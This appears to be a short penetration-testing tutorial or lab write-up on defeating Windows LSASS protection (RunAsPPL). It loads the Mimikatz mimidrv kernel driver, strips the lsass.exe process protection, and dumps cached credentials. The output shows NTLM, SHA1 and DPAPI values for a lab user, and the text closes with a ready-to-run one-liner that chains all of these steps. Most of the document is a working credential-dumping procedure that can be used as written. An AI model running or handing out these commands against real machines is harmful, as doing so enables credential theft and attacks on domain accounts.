Protected LSASS

Protected LSASS

To enable LSASS protection, we can modify the registry RunAsPPL DWORD value in

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa to 1

If the LSA protection is enabled, we will get an error executing the "sekurlsa::logonpasswords" command.

mimikatz # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

The command returns a 0x00000005 error code message (Access Denied). Lucky for us, Mimikatz provides a mimidrv.sys driver that works on kernel level to disable the LSA protection. We can import it to Mimikatz by executing "!+" as follows,

Loading the mimidrv Driver into Memory

mimikatz # !+
[*] 'mimidrv' service not present
[+] 'mimidrv' service successfully registered
[+] 'mimidrv' service ACL to everyone
[+] 'mimidrv' service started

Once the driver is loaded, we can disable the LSA protection by executing the following Mimikatz command:

Removing the LSA Protection

mimikatz # privilege::debug
mimikatz # !processprotect /process:lsass.exe /remove
Process : lsass.exe
PID 528 -> 00/00 [0-0-0]

Now, if we try to run the "sekurlsa::logonpasswords" command again, it must be executed successfully and show cached credentials in memory.

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 815631 (00000000:000c72ab)
Session           : RemoteInteractive from 2
User Name         : khan.chanthou
Domain            : VULNABLEONE
Logon Server      : CREDS-HARVESTIN
Logon Time        : 9/23/2023 4:46:21 AM
SID               : S-1-5-21-2366530601-1185510722-10638911-1114
        msv :
         [00000003] Primary
         * Username : khan.chanthou
         * Domain   : VULNABLEONE
         * NTLM     : ab525c9683e8fe067395ba2ddc971831
         * SHA1     : f33d7244aa8727f5139b01d8959141960aad5d21
         * DPAPI    : ed09e2e4f70ef66a400b8358c52a4649

We can use one-liner

mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords" "exit"